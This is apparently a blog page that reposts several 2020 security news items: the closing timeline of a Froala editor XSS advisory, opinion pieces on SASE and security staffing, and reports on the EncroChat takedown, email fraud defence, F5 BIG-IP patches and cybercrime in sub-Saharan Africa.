2020-04-21 Asked Froala for updates on the issue. Froala denied that there is any XSS issue, even if they confirmed the issue before. Delivered a PoC and additional details that demonstrates and explains the issue in detail. Froala understands the issue and tells that it will be fixed in the next release (no exact release date known but it should be fixed in Q2 of 2020)
2020-05-01 Asked Froala for updates on the issue. Still no release date known.
2020-06-02 Asked Froala for updates on the issue. Still no release date known.
2020-06-23 Asked Froala for updates on the issue. Should be released in July.
2020-07-01 Public disclosure after Q2 has ended and more than 200 days after initial notification. References
---------- [1] https://froala.com/wysiwyg-editor/
[2] https://wysiwyg-editor.froala.help/hc/en-us/articles/115000428829-Why-is-the-script-tag-being-removed-
[3] https://portswigger.net/web-security/cross-site-scripting/dom-based
[4] https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
[5] https://www.w3schools.com/tags/att_iframe_srcdoc.asp
[6] https://github.com/froala/wysiwyg-editor/issues?q=is%3Aissue+xss
[7] https://github.com/froala/wysiwyg-editor/issues/3270
[8] https://github.com/froala/wysiwyg-editor/issues/3039
[9] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N&version=3.1 _______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/ 







  By Date  
     
  By Thread  

Current thread:

  • CVE-2019-19935 – DOM XSS in Froala WYSIWYG HTML Editor Advisories (Jul 03)




Follow me for more information.

The industry’s latest buzzword is largely a repackaging exercise that bundles a collection of capabilities together and offers them as a cloud-delivered service.

A new buzzword invading the marketing materials of cybersecurity vendors is Standing for Secure Access Service Edge (SASE). The term, coined by Gartner, refers to a technology trend in support of cloud-based applications and remote working, in which networking and security functionality converge in a single offering.

Omdia has its reservations about SASE as a product category, but we recognize that numerous vendors have adopted this parlance to describe all or part of their network security offerings.

The idea of SASE is attractive: that a single vendor, operating from the cloud, can offer an enterprise all its requirements for branch and remote employee networking, plus all the functionality to deliver that connectivity securely. On the networking side, this mainly covers functionality delivered by most software-defined wide area networking (SD-WAN) platforms, including:

  • Dynamic WAN link management
  • Multipath application steering and failover
  • Quality of service
  • Network-layer visibility and path monitoring

Meanwhile, in terms of security, a range of capabilities should be present, namely:

  • Application-aware firewall (NGFW-like functionality)
  • Secure web gateway (web traffic proxying)
  • Cloud access security broker (CASB, delivering policy-based SaaS access management)
  • Access control (VPN or zero-trust access)

An argument can be made for other subgroups here, such as data loss prevention (DLP), which many CASBs now include as a matter of course, as well as capabilities such as mobile device management (MDM) and decryption and inspection of encrypted traffic.

As such, it becomes clear that SASE is essentially a repackaging exercise, bundling a collection of capabilities together and offering them as a cloud-delivered service, almost certainly as a shopping list from which the customer can pick and mix individual features. While delivering traditionally on-premises-based networking and security capabilities from the cloud is significant, mode of delivery alone does not make SASE a new class of technology. As such, the term is reminiscent of UTM (unified threat management), an early 2000s-era term for multifunction security appliances sold for small businesses and branch offices. While SASE may serve to encapsulate an idea, it is an exercise in marketing rather than an advance in technology.

Reactions Vary from Enthusiasm to Skepticism
SASE is largely about mode of delivery and product marketing, which explains why it is so easy for different types of vendors to adopt SASE and apply it to their offerings. Omdia identifies at least three groups of vendors that have applied the SASE marketing concept to position their product offerings:

  • Type 1. There are the top-tier cybersecurity, networking, and data center specialists, such as Palo Alto Networks, Akamai, VMware, and Zscaler, that have latched onto SASE as a “market” into which they can sell a subset of their overall portfolios. Several SD-WAN vendors are also in this group.
  • Type 2. Those CASB vendors that were not acquired during the great landgrab in that space (Netskope, Bitglass, and CipherCloud) have generally embraced the term, albeit with differing degrees of enthusiasm.
  • Type 3. Then there is a group of vendors that had been struggling to find an appropriate acronym for what they do. They can complement, or obviate the need for, an SD-WAN: OPAQ, NetFoundry, and Cato Networks are in this category. SASE provides a convenient peg on which to hang their respective hats.

For all this enthusiasm, however, SASE is not without its critics. Omdia’s Clifford Grossner has described it as “simply edge computing, connectivity, and security with integrated management,” and questioned whether enterprises would want to buy all this from a single supplier, since it means placing a sizable bet on just one technology provider.

There are those who have criticized the absence of analytics or machine learning for purposes of automating functionality from the basic set of capabilities. And while some in the vendor community have hailed SASE as “the future of SD-WAN,” others point to the evolution of SD-branch as the more likely route.

SASE Should Eventually Cede to Multimodal Solutions
There is little question that SASE is presently at or near the apex of its hype cycle. Omdia bases this both on anecdotal references to the term/acronym as well as recent market events. Of note are Palo Alto Networks’ recent $420 million acquisition of CloudGenix, largely driven by SD-WAN technology to bolster its Prisma SASE offering, as well as recently repositioned SASE vendor Cato Networks landing a new $77 million Series D round of venture capital funding. Clearly, vendors and investors alike see SASE-aligned solutions as an area of opportunity.

Perhaps the most helpful benefit SASE provides the marketplace is an easy-to-understand shorthand to describe a cloud-delivered solution set combining integrated networking and security functions. What was recently a somewhat obscure, hard-to-define concept for individual vendors to articulate suddenly becomes much faster to convey and easier to understand, particularly for those learning about the associated solution sets for the first time. This alone will unquestionably help facilitate adoption of SASE-aligned product offerings.

Despite the many benefits of cloud-delivered IT, SASE is merely the latest waypoint of an ongoing journey that will see continued evolution in the way cybersecurity technology is delivered. The rise of microservices-based and serverless architectures will again require security to be delivered through alternative means, likely as componentized functions within modular application architectures. The ongoing proliferation of Internet of Things (IoT) devices, most notably on the network edge, will drive growing need for IoT security functionality, delivered from the network edge in order to reduce IoT application latency and ensure bandwidth efficiency. Undoubtedly, other technologies that Omdia expects will become prominent in the coming decade — such as 5G, autonomous systems, and quantum computing — will further disrupt and change the way in which cybersecurity solutions are delivered.

Multimodal Requirements
Ultimately, Omdia sees most cybersecurity technology segments evolving toward a multimodal delivery paradigm. As digital transformation takes hold, enterprises will come to demand fluidity in how their cybersecurity technology is delivered, based on evolving business needs (a new branch office opens; another company becomes a subsidiary; a division is spun off and requires access to some applications during the transition; even perhaps a new strain of virus forces an entire business unit to work from home indefinitely…).

An increasing pace of change within enterprise IT means today’s need for cloud-delivered security may fluidly evolve into tomorrow’s need for security delivered on the edge or as componentized functions, and just as quickly revert back again. Enterprises can expect multimodal offerings that can be dynamically provided in a variety of delivery modes, with pricing and licensing to accommodate change on demand.  

Related Content: 

Learn from industry experts in a setting that is conducive to interaction and conversation about how to prepare for that “really bad day” in cybersecurity. Click for more information and to register for this On-Demand event. 

 

Rik is a principal analyst in Omdia’s IT security and technology team, specializing in cybersecurity technology trends, IT security, compliance, and call recording.  He provides analysis and insight on market evolution and helps end users determine what type of … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Cybersecurity staff are on edge for the same reason that there are no cooks on the ISS: Organizations are carefully watching expenses for jobs that don’t require dedicated team members.

There are no cooks in space.

Think about it: When we picture the great seagoing voyages of discovery, there were cooks, chandlers, medics, and all sorts of other support staff. But that’s not the case in space. And the reasons why have critical echoes for professionals in cybersecurity.

Today, it costs roughly $10,000 to put one pound into orbit. If you pick a weight of 150 pounds for a space cook, that means it would cost $1.5 million just to get the cook into orbit. Add in food, clothes, and all the other material required to support a human, and it starts to be an awful lot of money for someone to sling hash for astronauts.

The cost of putting stuff in orbit means that everything that goes into the payload section of a rocket has to be directly tied to the mission at hand. There just isn’t room in the budget for much in the way of support.

When you talk to executives in enterprise IT today, you hear some of the same language. Everything — everything — that companies are doing right now is focused on bringing in revenue. If it isn’t tied to the balance sheet’s top line, it’s not a priority.

Core Competency
We all have to admit that security is rarely tied to increasing revenue. Business trends have somewhat predictably swung between definitions of “core competency” that were laser-focused on the primary product or service being sold, and those that include all important support tasks. A global pandemic has moved the needle squarely toward the “laser focus” side of the spectrum. And that means many security professionals find themselves feeling like a NASA astro-cook: It’s a nice idea but an awfully expensive way to get the job done.

At the same time, though, what we haven’t seen is a broad enterprise move to the modern astronaut model in IT. On modern space flights, there are no cooks because the astronauts — typically highly trained test pilots, PhD scientists and engineers, or both rolled into a very highly skilled package — cook their own food. They also straighten up after themselves, clear any sanitation issues, and act as mechanics for the craft when something goes wrong.

In all of these cases, the focus is on the mission and the people carrying out the mission. The support functions are simply tacked onto their primary tasks. In business, you tend to see this degree of task-stacking in only the smallest companies, where the assumption is that the various support tasks won’t actually be done very well. Specialization and expertise are benefits that larger enterprises are presumed to be able to access: Will the coronavirus epidemic take away these advantages as it takes office culture and free coffee?

Competence, Cost, and Core Business
Anecdotally, enterprises are responding in a couple of ways. First, they have for some time been shifting perimeter protection and security analysis to managed security service providers (MSSPs). As I talk with CISOs and CIOs, it seems that the pandemic has accelerated this transition, even as organizations work to firm up the knowledge necessary to properly write contracts and manage relationships with the service providers.

Next, there are companies that have decided to list security in the “nice to have” category, accepting the risk that they might have a security incident before they’re able to restart their normal spending.

Some companies say they’re adopting something closer to the astronaut model, adding security responsibilities to the job descriptions of IT generalists and even line-of-business employees. While some IT generalists can become quite competent at IT security, turning enterprise “mission specialists” into cybersecurity staff isn’t realistic if for no other reason than the fact that cybersecurity has become a complex and demanding specialty. Most organizations feel they’ve done well if they can take employees out of the “adversary” category and into a neutral classification — pulling them all the way into the “security staff” is an orbit too far.

Security’s Value
Ultimately, the question will come down to security’s value to the organization’s mission. Over the past few years I’ve had many conversations with CISOs and other senior cybersecurity executives about what might take security out of the purely expense accounting category. While I’ve heard many optimistic statements about reducing transitional friction for customers and employees, most experts acknowledge that security is an expense rather than a revenue-producing activity.

Right now companies of all sizes are re-evaluating expenses once thought to be essential. The expense for office space is one such example that comes immediately to mind as ripe for rethinking. Cybersecurity isn’t in that category because almost everyone can see that working from home requires a different security strategy than one in which most employees are coming into the office. (That new model requires a new analogy and another column, so I won’t get into it here.)

The fact is that, until business revenue increases on a broad basis and cybersecurity’s profile in the enterprise is raised, executives will see most cybersecurity staff in the same light as astronaut cooks: something that’s really useful, but an awfully expensive way to get the job done.

Related Content:

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

encrochat encrypted pgp phone

In a joint operation, European and British law enforcement agencies recently arrested hundreds of alleged drug dealers and other criminals after infiltrating into a global network of an encrypted chatting app that was used to plot drug deals, money laundering, extortions, and even murders.

Dubbed EncroChat, the top-secret encrypted communication app comes pre-installed on a customized Android-based handset with GPS, camera, and microphone functionality removed for anonymity and security.

EncroChat phones aim to securely exchange data and messages with pre-loaded apps for secure instant messaging, VOIP calling, self destruct messages, and includes a ‘kill code’ functionality to let users remotely wipe complete data in times of trouble.

The handset and its services, which cost around £1,500 for a six-month subscription, had 60,000 users worldwide and approximately 10,000 users in the United Kingdom.

“EncroChat phones were presented to customers as guaranteeing perfect anonymity (no device or SIM card association on the customer’s account, acquisition under conditions guaranteeing the absence of traceability) and perfect discretion both of the encrypted interface (dual operating system, the encrypted interface being hidden so as not to be detectable) and the terminal itself (removal of the camera, microphone, GPS and USB port),” Europol said.

[embedded content]

However, the encrypted communication network was not so secure, as French and Dutch police successfully hacked into the network and analyzed millions of messages and hundreds of thousands of images in real-time, “over the shoulder of the unsuspecting senders.”

International law enforcement authorities successfully dismantled Encrochat and disrupted one of the key communication networks used by some of the most severe offenders.

The National Crime Agency, Europol and Metropolitan Police on Thursday announced that they shut down the EncroChat servers and arrested 746 suspects, including two law enforcement officers, which resulted in the seizure of:

  • over £54 million in illegal cash,
  • 77 firearms, including an AK47 assault rifle, submachine guns, handguns, four grenades, and over 1,800 rounds of ammunition
  • More than two tonnes of Class A and B drugs
  • Over 28 million Etizolam pills (street Valium) from an illicit laboratory
  • 55 high-value cars, and 73 luxury watches

The NCA also worked closely with policing partners to successfully mitigate more than 200 threats to life by preventing rival gangs from carrying out kidnappings and executions on Britain’s streets.

“In early 2020, EncroChat was one of the largest encrypted digital communication providers with a very high share of users presumably engaged in criminal activity. User hotspots were particularly present in source and destination countries for cocaine and cannabis trade, as well as in money laundering centers,” Europol said.

Law enforcement agencies claimed to have cracked the encryption code of EncroChat in March this year and began penetrating data from April 1. On June 13, EncroChat realized the platform had been penetrated and sent a message to users urging them to throw away their devices as its servers had been compromised by law enforcement.

hacker arrested

“A large number of suspects have also been arrested in several countries which were not participating in the JIT (joint investigation team) but particularly affected by the illegal use of these phones by individuals active in organized crime, including in the UK, Sweden, and Norway,” Europol said.

“The effects of the operation will continue to echo in criminal circles for many years to come, as the information has been provided to hundreds of ongoing investigations and, at the same time, is triggering a very large number of new criminal investigations of organised crime across the European continent and beyond.”

Follow me for more information.

Sponsored Business Email Compromise (BEC) and Email Account Compromise (EAC) are the most expensive cyber threats facing businesses around the globe. The FBI’s Internet Crime Complaint Center (IC3) reports that both scams have resulted in worldwide losses of $26 billion since 2016 – with $1.7 billion in the last year alone.

No organisation is immune – nearly 90% experienced these types of attacks in 2019. In the past year alone, victims have ranged from the tiny Florida city of Ocala to Japan’s largest media conglomerate, via a national museum in the Netherlands, racking up losses of over $33 million between them.

While the basic methodology is similar, each attack has its own unique personality – a web of ploys and psychological tricks, combining elements of phishing, social engineering, spoofing and wire fraud. In both cases, the attacker, posing as a trusted contact, tricks the victim over email into wiring money or sending sensitive data.

In the event of a BEC attack, these fraudulent emails are sent from spoofed or lookalike domains and display-names. Where EAC is concerned, the attacker takes over the actual email account of someone the victim trusts — in essence, becoming that trusted person.

Both are incredibly difficult to spot. By their very nature, successful attacks appear convincing. They are carefully designed not to stand out, trigger defences or arouse suspicions. What’s more, BEC and EAC tactics are complex, multifaceted and ever-changing.

This makes defending against them a considerable challenge. Just as organisations thwart one threat, another appears elsewhere in an incredibly high-stakes game of whack-a-mole.

That said, while fighting BEC and EAC is difficult, it’s not impossible. But doing so requires company-wide awareness and understanding of both common attack methods and the best ways to limit their chances of success.

A threat-aware cyber defence

While this type of attack has grown more refined, targeted, and inconspicuous in recent years, there remains a few tell-tale signs of BEC and EAC.

Ensuring every member of your organisation, across all levels, is aware of these red flags will significantly increase your chances of defending against them. Common warning signs include: Time-sensitive requests: The longer an account is spoofed or compromised, the greater the chance of arousing suspicion. Cybercriminals know this. They also know that victims are most likely to make mistakes under pressure.

That’s why fraudulent requests are often time-sensitive.

An attacker may ask for an urgent ‘last-minute change’ to an invoice or make a request at the end of the workday, stressing that it must be completed before the close of business.

Personal requests: Spoofing the personal email address of an executive or employee allows cybercriminals to bypass corporate defences and adds a more personal touch to the scam.

Posing as a legitimate contact, attackers may email to say they are out of the office and have received a request from a critical supplier to change payment information. Victims will be asked to help, ‘just this once’, to ensure payments are not delayed.

Direct requests from the supply chain: An increasingly popular attack method involves the use of supplier identities, whether spoofed or compromised.

Posing as a third-party allows attackers to circumvent internal controls and make direct requests for changes to payment information. This approach also adds an extra degree of separation, as employees may not be as familiar with suppliers as they are with their colleagues.

Fighting an insidious threat

Whatever the threat, a successful cyber defence must always combine technology, process, and people.

Your organisation should be equipped with controls, particularly on email and cloud accounts, to monitor network access, authenticate domains, and flag malicious content.

Beyond this, you need processes in place to verify all requests for expedited payment or changes to banking information. Better still, ensure that any request concerning finance or other sensitive data is authenticated at multiple points, and never solely by email. Next comes the most important tool in your arsenal – your people. Once an account is successfully compromised, any requests sent to or from it are unlikely to trigger network controls.

With the attacker inside your network, it is your people who quickly become the last and only line of defence. The consequences for this line of defence failing can be severe. That’s why you must equip your end-users with the knowledge and education to detect and deter malicious communications.

This is only possible through comprehensive, ongoing, adaptive cybersecurity training that evolves to reflect the latest threat landscape. Training must be much more than a once-a-year box-ticking exercise.

Employees not only need to be aware of common attack methods, but they must also have a deep-seated understanding of the vital role they play in protecting your organisation from those attacks. The result is a culture within which cyber defence is everyone’s responsibility.

None of these strategies alone can protect your organisation from BEC and EAC attacks. But combined, they create a multi-layered, complex, and people-centric defence – one that could save your business from becoming yet another sorry statistic.

Sponsored by Proofpoint

Follow me for more information.

Network administrators are urged to patch their F5 BIG-IP application delivery controllers following the disclosure of a pair of critical remote takeover bugs.

The flaws in question, CVE-2020-5902 and CVE-2020-5903, lie within in a configuration tool known as the Traffic Management User Interface. Successful exploitation results in full admin control over the device.

In the case of CVE-2020-5902, the hole puts the equipment at risk of arbitrary code execution, while CVE-2020-5903 is a JavaScript-based cross-site-scripting vulnerability. CVE-2020-5902 has a CVSS score of 10 out of 10, which is not good, while CVE-2020-5903 has a lower, but still serious, score of 7.5.

“The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” said Mikhail Klyuchnikov of Positive Technologies who discovered and reported the vulnerabilities to F5.

patch

Hold off that rush into the July 4 weekend – you may need this: Microsoft patches pwn-by-picture pitfalls in Win 10

READ MORE

“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation.”

These flaws are particularly bad because the vulnerable BIG-IP gear is generally used by large enterprises to handle traffic to and from critical applications. A successful attack could potentially be disastrous for Fortune 500 companies that make up F5’s userbase.

Admins are advised to update their firmware as soon as possible. The flaws are present in BIG-IP versions 11 through 15, and the updated versions, released this week, are 15.1.0.4, 14.1.2.6, 13.1.3.4, 12.1.5.2, and 11.6.5.2. BIG-IQ and Traffix SDC products are not vulnerable.

Fixing the bugs could be a bit of a pain, as the app delivery gear by definition sits in between critical application servers and users on the network, and patching could mean downtime. Those in the US might want to take advantage of the upcoming holiday weekend.

Ideally, the vulnerable traffic management interface is not exposed to the open internet. However, it is estimated more than 10,000 devices running the software could be facing the public web. Positive Technologies reckons that figure is at least 8,000. Gulp. ®

Follow me for more information.

Security experts discuss the rise in cybercrime affecting sub-Saharan Africa and the necessary changes to improve security.

The use of technology is rapidly expanding across sub-Saharan Africa, putting its people and businesses at risk as cybercriminals take advantage. Experts say this trend emphasizes a critical need for new policies and tools designed for the region’s distinct operating environment.

IDC data shows sub-Saharan Africa’s ICT market is predicted to grow from $95.4 billion in 2020 to $104.2 billion by 2023. Technologies including cloud, social media, and big data are all key areas of growth and components to a sharp rise in digital crime. The World Economic Forum considers cybercrime one of the three greatest threats to Africa, where sub-Saharan nations lose millions of dollars to cyberattacks each year – a very large sum in proportion to their GDP.

Cybersecurity consultant Laura Tich and security researcher Evelyn Kilel noticed a lack of data on the security landscape of sub-Saharan Africa when designing a curriculum for members of Shehacks_KE. The duo co-founded this organization to create a community of women in infosec across Kenya. They offer educational initiatives like meetups, bootcamps, and webinars, and partner with organizations to see where they can help fill the gaps in security talent.  

Their own research and professional experience have given Tich and Kilel greater insight into the region’s security threats. Mobile banking, for example, is ripe for attack. “Mobile money and mobile platforms are the key platforms where we transact, where we process our cashflows,” Kilel explains. Africa leads the world in the use of mobile money transfers, she and Tich say, with an estimated 14% of its citizens receiving money via mobile transfers like Kenya’s MPesa.

Mobile money is a prime target; both users and providers are hit with different kinds of attacks. Social engineering and reverse engineering are common on financial platforms. Social media has also become a popular space for social engineering threats. “When it comes to mobile money and social media, some of our biggest threats are mainly human-based,” Tich says.

Where Sub-Saharan Businesses Stand
While progress has been made in enterprise cybersecurity, work remains to be done. Small and midsize enterprises (SMEs) typically have small budgets and tend to not include cybersecurity, Tich says. Many companies make security an afterthought. Larger firms tend to have stronger security departments, she adds, and some have bug-bounty programs.

“We can say the bigger organizations do know the value of cybersecurity while the smaller organizations, as much as they might know about cybersecurity, they do not have the budget for it, so it becomes a problem,” she explains.

SMEs are adapting to their situations by moving to the cloud, which allows them to pay as they go, minimize their infrastructure, and operate more easily, Kilel says. Most work with Google Cloud and AWS; however, she adds that more businesses are also moving toward Azure. Last year Microsoft opened its first Africa Development Center in Kenya and Nigeria. Tich expects this will lead to technological growth, “but we also need people to come in with security expertise.”

As much as the region is catching up, Tich notes security will continue to pose a problem to enterprises. Some organizations, especially larger ones, still use legacy systems that are susceptible to cyberattacks and may fear telling clients if an incident takes place. The technology, human attack vectors, budget, and economy all determine how attacks are constructed and the attacker’s approach to specific platforms in the sub-Saharan region.

How to Improve: Brainstorming Policies and Solutions
In building out their SheHacks_KE educational efforts, Tich and Kilel realized there wasn’t much data for them to work with.

“There’s little to no data about the cybersecurity field, or the cybersecurity landscape, in sub-Saharan Africa,” says Tich. “And we realized that this is a problem because if we do not know what is needed, then we won’t know what solutions to offer.” Research is essential, she adds, as it helps them better explain to companies why they need a certain security tool or skill set.

In addition to improved research, the experts point to a need for effective policies and tools designed for the distinct operating environment of the sub-Saharan region. Most organizations struggle with limited budget, high cost of security products, use of pirated versions of security tools, and the absence of sufficient tools to provide accurate data. They propose encouraging local security pros to develop open source or affordable tools for the local market.

They also emphasize the need for policies on an organizational and national level to address security incidents, voicing a need for better data protection policies to protect both people and businesses from cybercrime. If data is stolen, there should be a process to take care of it.

“Policies are important on an organizational level, but it’s very important also from a regional and national level,” Tich says. “We have to work with policymakers, other techies, other security professionals, and other stakeholders in order to come up with better cybersecurity policies for the regions.”

Tich and Kilel will share insights into the sub-Saharan security landscape, along with proposed policies and solutions, in their upcoming Black Hat USA talk, “Building Cyber Security Strategies for Emerging Industries in Sub-Saharan Africa,” to take place on Aug. 6, 2020.

Related Content:

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio

Recommended Reading:

More Insights

Follow me for more information.

Product categories

Post

July 2020
SMTWTFS
 1234
567891011
12131415161718
19202122232425
262728293031 
X